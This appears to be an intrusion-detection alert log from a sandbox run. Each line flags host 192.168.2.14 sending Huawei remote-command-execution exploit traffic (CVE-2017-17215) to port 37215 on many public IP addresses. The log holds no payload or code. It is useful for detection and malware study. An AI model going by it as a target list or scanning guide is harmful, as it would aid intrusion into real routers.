                                            06/14/24-10:44:20.828476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848837215192.168.2.14197.174.114.23
                                            06/14/24-10:44:31.050972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147637215192.168.2.14156.185.3.251
                                            06/14/24-10:44:31.051318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932637215192.168.2.14197.140.151.8
                                            06/14/24-10:44:02.382553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666437215192.168.2.14156.60.60.110
                                            06/14/24-10:44:20.806126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839837215192.168.2.1441.80.90.223
                                            06/14/24-10:43:50.073605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614037215192.168.2.1441.92.68.60
                                            06/14/24-10:43:43.944527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146237215192.168.2.1441.123.133.78
                                            06/14/24-10:43:58.276208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946437215192.168.2.14197.236.142.236
                                            06/14/24-10:44:02.368830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012037215192.168.2.14156.40.148.244
                                            06/14/24-10:43:41.849639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859637215192.168.2.1441.254.243.150
                                            06/14/24-10:44:00.323300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339437215192.168.2.14156.179.75.74
                                            06/14/24-10:44:16.716065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475437215192.168.2.14197.208.83.55
                                            06/14/24-10:44:10.581170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087637215192.168.2.1441.236.1.12
                                            06/14/24-10:44:16.734915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627237215192.168.2.14197.62.63.225
                                            06/14/24-10:44:10.547614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975437215192.168.2.14197.134.247.219
                                            06/14/24-10:43:58.272935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747637215192.168.2.1441.249.65.27
                                            06/14/24-10:44:29.028073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547637215192.168.2.1441.44.245.46
                                            06/14/24-10:43:58.290118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928637215192.168.2.1441.169.26.226
                                            06/14/24-10:44:18.777108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541637215192.168.2.14197.5.232.128
                                            06/14/24-10:44:20.827381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494837215192.168.2.14156.184.95.95
                                            06/14/24-10:43:41.906394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302237215192.168.2.1441.119.231.97
                                            06/14/24-10:44:00.344508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601237215192.168.2.1441.211.101.201
                                            06/14/24-10:44:08.503060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377837215192.168.2.14197.76.124.4
                                            06/14/24-10:43:39.791164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.14156.189.31.235
                                            06/14/24-10:43:56.242238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.1441.110.90.56
                                            06/14/24-10:44:27.001937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008237215192.168.2.14197.210.19.117
                                            06/14/24-10:43:39.812797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593437215192.168.2.14156.229.95.39
                                            06/14/24-10:44:31.051125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268637215192.168.2.14197.168.224.62
                                            06/14/24-10:44:10.565530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489237215192.168.2.1441.51.202.50
                                            06/14/24-10:43:34.677576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393237215192.168.2.14197.204.104.152
                                            06/14/24-10:44:33.133642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863237215192.168.2.1441.56.88.142
                                            06/14/24-10:44:26.980776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4500437215192.168.2.1441.122.17.250
                                            06/14/24-10:44:14.671748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318437215192.168.2.14197.167.46.22
                                            06/14/24-10:43:36.699039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773037215192.168.2.14197.253.193.58
                                            06/14/24-10:44:00.324336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608037215192.168.2.14197.175.241.185
                                            06/14/24-10:43:39.811821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.14197.205.170.169
                                            06/14/24-10:44:00.341340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487837215192.168.2.14197.41.7.175
                                            06/14/24-10:44:18.776907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727637215192.168.2.1441.64.243.4
                                            06/14/24-10:44:12.614009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713837215192.168.2.14197.71.192.161
                                            06/14/24-10:44:10.568407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026237215192.168.2.14156.173.96.7
                                            06/14/24-10:44:20.807605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728837215192.168.2.14156.16.66.249
                                            06/14/24-10:44:20.829204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771637215192.168.2.14197.33.128.48
                                            06/14/24-10:44:31.088890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073437215192.168.2.14156.72.141.220
                                            06/14/24-10:44:33.148904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752837215192.168.2.14197.84.139.250
                                            06/14/24-10:43:58.290951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788837215192.168.2.14197.225.174.77
                                            06/14/24-10:44:16.717023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351437215192.168.2.1441.30.194.62
                                            06/14/24-10:43:54.186684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315637215192.168.2.14156.69.85.65
                                            06/14/24-10:43:56.226670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696637215192.168.2.14197.213.255.126
                                            06/14/24-10:43:43.968826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443437215192.168.2.14197.201.100.203
                                            06/14/24-10:43:56.228778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580237215192.168.2.14156.5.42.74
                                            06/14/24-10:43:41.900009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693437215192.168.2.14197.33.107.160
                                            06/14/24-10:44:26.978376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205437215192.168.2.14197.25.187.32
                                            06/14/24-10:43:34.663249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5823437215192.168.2.1441.129.130.21
                                            06/14/24-10:43:37.760243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900037215192.168.2.14197.204.141.63
                                            06/14/24-10:43:50.072495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364037215192.168.2.14197.178.92.35
                                            06/14/24-10:44:04.408602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009637215192.168.2.14156.47.218.239
                                            06/14/24-10:43:34.660597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809237215192.168.2.14197.156.162.157
                                            06/14/24-10:44:06.472203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250037215192.168.2.14156.51.74.112
                                            06/14/24-10:43:50.075140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245437215192.168.2.14197.131.172.235
                                            06/14/24-10:43:36.701389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623237215192.168.2.14156.59.211.171
                                            06/14/24-10:44:31.056458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644837215192.168.2.14197.126.196.157
                                            06/14/24-10:44:31.051362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701237215192.168.2.14197.113.178.136
                                            06/14/24-10:43:41.896548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143037215192.168.2.14197.217.192.190
                                            06/14/24-10:43:56.227154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.14156.229.187.84
                                            06/14/24-10:44:31.055116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520237215192.168.2.1441.13.222.137
                                            06/14/24-10:44:33.132670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210437215192.168.2.14156.11.253.151
                                            06/14/24-10:43:43.942557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739037215192.168.2.1441.254.255.107
                                            06/14/24-10:44:33.151221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601837215192.168.2.14156.223.21.148
                                            06/14/24-10:43:56.250795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129437215192.168.2.1441.102.144.149
                                            06/14/24-10:44:12.643877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875837215192.168.2.14156.102.50.213
                                            06/14/24-10:43:58.277985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597437215192.168.2.14156.225.224.82
                                            06/14/24-10:43:52.150100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370237215192.168.2.14197.199.155.185
                                            06/14/24-10:44:29.011347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120037215192.168.2.14197.196.106.113
                                            06/14/24-10:44:26.977482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501437215192.168.2.14197.138.37.185
                                            06/14/24-10:43:39.810632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699837215192.168.2.1441.179.220.183
                                            06/14/24-10:44:12.646637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853837215192.168.2.14156.34.195.188
                                            06/14/24-10:44:10.568259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.14156.79.199.248
                                            06/14/24-10:44:12.625526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527237215192.168.2.1441.210.137.251
                                            06/14/24-10:43:48.029490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789237215192.168.2.1441.175.241.193
                                            06/14/24-10:44:04.409995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137437215192.168.2.14156.253.19.243
                                            06/14/24-10:44:24.917334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322037215192.168.2.1441.60.23.76
                                            06/14/24-10:44:14.681592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227237215192.168.2.14156.163.51.17
                                            06/14/24-10:44:22.877613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559037215192.168.2.14156.39.168.236
                                            06/14/24-10:44:35.177716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590837215192.168.2.14156.227.131.218
                                            06/14/24-10:43:45.965814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552237215192.168.2.1441.61.92.180
                                            06/14/24-10:43:52.149059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467237215192.168.2.14156.34.165.235
                                            06/14/24-10:44:26.998270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534837215192.168.2.1441.78.51.254
                                            06/14/24-10:43:48.018051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919237215192.168.2.14156.9.221.172
                                            06/14/24-10:44:04.421999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237037215192.168.2.1441.181.227.125
                                            06/14/24-10:43:34.662099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289437215192.168.2.1441.153.119.111
                                            06/14/24-10:44:16.715906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043237215192.168.2.14197.249.160.113
                                            06/14/24-10:43:50.071038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.14156.45.98.10
                                            06/14/24-10:43:58.275326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515237215192.168.2.14156.175.180.142
                                            06/14/24-10:44:04.424353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762837215192.168.2.1441.37.103.215
                                            06/14/24-10:44:14.684168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199437215192.168.2.1441.75.122.21
                                            06/14/24-10:44:02.382903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575037215192.168.2.1441.58.191.201
                                            06/14/24-10:44:08.517229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072637215192.168.2.14197.174.124.4
                                            06/14/24-10:44:08.503988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4316637215192.168.2.14156.126.20.13
                                            06/14/24-10:43:52.145564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403837215192.168.2.14156.141.61.170
                                            06/14/24-10:44:22.860060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121637215192.168.2.14156.1.228.107
                                            06/14/24-10:44:26.998088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419437215192.168.2.14197.214.67.200
                                            06/14/24-10:43:36.701611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708037215192.168.2.14156.28.77.238
                                            06/14/24-10:44:18.779570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733237215192.168.2.14197.206.242.66
                                            06/14/24-10:44:00.338556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867237215192.168.2.14156.28.171.212
                                            06/14/24-10:44:06.471719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.14156.245.108.156
                                            06/14/24-10:43:45.992211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470237215192.168.2.1441.236.220.53
                                            06/14/24-10:44:14.666865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523037215192.168.2.14156.0.99.1
                                            06/14/24-10:44:14.682177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640637215192.168.2.1441.183.139.203
                                            06/14/24-10:44:33.134710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979437215192.168.2.14197.174.211.65
                                            06/14/24-10:44:22.882774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707237215192.168.2.14197.4.74.17
                                            06/14/24-10:43:37.761593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.14156.53.210.229
                                            06/14/24-10:43:39.790535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206037215192.168.2.14156.5.246.226
                                            06/14/24-10:43:56.230646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968837215192.168.2.14197.104.25.5
                                            06/14/24-10:44:22.859504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193837215192.168.2.1441.200.226.96
                                            06/14/24-10:43:45.989965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339637215192.168.2.1441.171.206.186
                                            06/14/24-10:44:00.322126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746037215192.168.2.1441.188.76.79
                                            06/14/24-10:44:31.051065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680037215192.168.2.1441.159.0.83
                                            06/14/24-10:43:43.940477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538637215192.168.2.14197.128.152.155
                                            06/14/24-10:44:12.616866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826037215192.168.2.1441.232.154.42
                                            06/14/24-10:43:50.110762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858837215192.168.2.14197.25.121.9
                                            06/14/24-10:43:52.159804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373237215192.168.2.1441.108.180.1
                                            06/14/24-10:44:22.857938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077837215192.168.2.14156.167.3.67
                                            06/14/24-10:43:36.717019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948837215192.168.2.14156.125.27.234
                                            06/14/24-10:44:27.001039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228637215192.168.2.1441.91.105.80
                                            06/14/24-10:44:35.179038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999637215192.168.2.14156.96.138.253
                                            06/14/24-10:44:31.050884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431037215192.168.2.14156.154.114.172
                                            06/14/24-10:44:24.917090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374837215192.168.2.1441.60.239.147
                                            06/14/24-10:44:10.549338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104437215192.168.2.14156.236.149.30
                                            06/14/24-10:44:12.624517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961237215192.168.2.14197.132.138.138
                                            06/14/24-10:44:33.148842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037437215192.168.2.1441.133.6.29
                                            06/14/24-10:43:34.661710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703437215192.168.2.14197.224.78.64
                                            06/14/24-10:43:48.028744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905437215192.168.2.14156.74.63.87
                                            06/14/24-10:43:37.760598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823237215192.168.2.14197.134.205.84
                                            06/14/24-10:44:33.134741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836437215192.168.2.1441.203.113.141
                                            06/14/24-10:44:04.419789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758437215192.168.2.1441.159.226.192
                                            06/14/24-10:43:34.677630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488437215192.168.2.14197.73.253.240
                                            06/14/24-10:44:10.548851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404837215192.168.2.14156.209.181.112
                                            06/14/24-10:43:34.675927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654237215192.168.2.1441.104.63.204
                                            06/14/24-10:43:58.290704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313837215192.168.2.14197.120.95.226
                                            06/14/24-10:43:54.184079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969237215192.168.2.1441.91.45.114
                                            06/14/24-10:43:39.789623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892237215192.168.2.1441.14.47.226
                                            06/14/24-10:44:31.056414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708637215192.168.2.14197.82.147.200
                                            06/14/24-10:43:48.029329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477637215192.168.2.14197.81.190.211
                                            06/14/24-10:44:22.879619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833237215192.168.2.14156.212.77.150
                                            06/14/24-10:44:20.830298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552637215192.168.2.1441.254.144.159
                                            06/14/24-10:43:34.663363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651637215192.168.2.1441.75.213.161
                                            06/14/24-10:44:22.883213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196037215192.168.2.14197.239.241.181
                                            06/14/24-10:44:14.687856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478437215192.168.2.1441.19.144.247
                                            06/14/24-10:44:29.023956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817837215192.168.2.14197.96.43.97
                                            06/14/24-10:44:00.338209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820437215192.168.2.14197.128.40.230
                                            06/14/24-10:44:29.014924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758037215192.168.2.1441.231.199.237
                                            06/14/24-10:43:41.899151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483437215192.168.2.14156.220.39.142
                                            06/14/24-10:44:31.083796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970237215192.168.2.1441.187.230.190
                                            06/14/24-10:44:12.646156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006437215192.168.2.14197.219.129.131
                                            06/14/24-10:44:06.453755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571237215192.168.2.1441.179.38.50
                                            06/14/24-10:44:24.944438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343837215192.168.2.14156.31.107.253
                                            06/14/24-10:44:20.805270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725037215192.168.2.14197.102.61.100
                                            06/14/24-10:44:10.565486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846637215192.168.2.1441.82.6.30
                                            06/14/24-10:43:54.184294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854037215192.168.2.14197.11.133.111
                                            06/14/24-10:44:08.503865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394437215192.168.2.1441.243.234.167
                                            06/14/24-10:44:33.133176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936437215192.168.2.14156.206.99.39
                                            06/14/24-10:43:52.150342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942037215192.168.2.14156.245.93.27
                                            06/14/24-10:43:36.725850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583637215192.168.2.14156.11.178.136
                                            06/14/24-10:43:50.074042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432237215192.168.2.14197.199.221.135
                                            06/14/24-10:43:48.020729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978837215192.168.2.14197.184.247.107
                                            06/14/24-10:44:22.881342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975437215192.168.2.14156.109.188.212
                                            06/14/24-10:43:39.793027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14156.220.120.7
                                            06/14/24-10:43:52.164392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016237215192.168.2.14156.25.77.184
                                            06/14/24-10:44:22.859816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135837215192.168.2.14197.75.208.151
                                            06/14/24-10:43:39.811308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5418037215192.168.2.14156.0.158.24
                                            06/14/24-10:44:24.914978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.14156.46.248.88
                                            06/14/24-10:44:35.183222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347637215192.168.2.14197.19.191.229
                                            06/14/24-10:44:02.382094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811837215192.168.2.14156.139.123.21
                                            06/14/24-10:44:24.914690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680437215192.168.2.1441.195.1.51
                                            06/14/24-10:43:36.725141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600237215192.168.2.14156.179.188.118
                                            06/14/24-10:43:43.969651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363437215192.168.2.14197.32.60.24
                                            06/14/24-10:44:22.862322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342037215192.168.2.14197.32.221.83
                                            06/14/24-10:44:35.180573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625637215192.168.2.14197.152.204.124
                                            06/14/24-10:43:37.762653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469037215192.168.2.14197.53.253.110
                                            06/14/24-10:43:52.148115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700237215192.168.2.1441.178.166.11
                                            06/14/24-10:43:45.968813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102237215192.168.2.14156.108.65.199
                                            06/14/24-10:43:56.229537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806437215192.168.2.1441.113.123.249
                                            06/14/24-10:43:43.943176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576637215192.168.2.14156.59.67.215
                                            06/14/24-10:43:48.017679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984637215192.168.2.1441.60.210.172
                                            06/14/24-10:44:12.616654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874237215192.168.2.14197.240.152.18
                                            06/14/24-10:44:22.879329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343837215192.168.2.1441.239.16.237
                                            06/14/24-10:44:08.516899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741037215192.168.2.1441.124.235.116
                                            06/14/24-10:44:31.052490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772437215192.168.2.14156.136.199.17
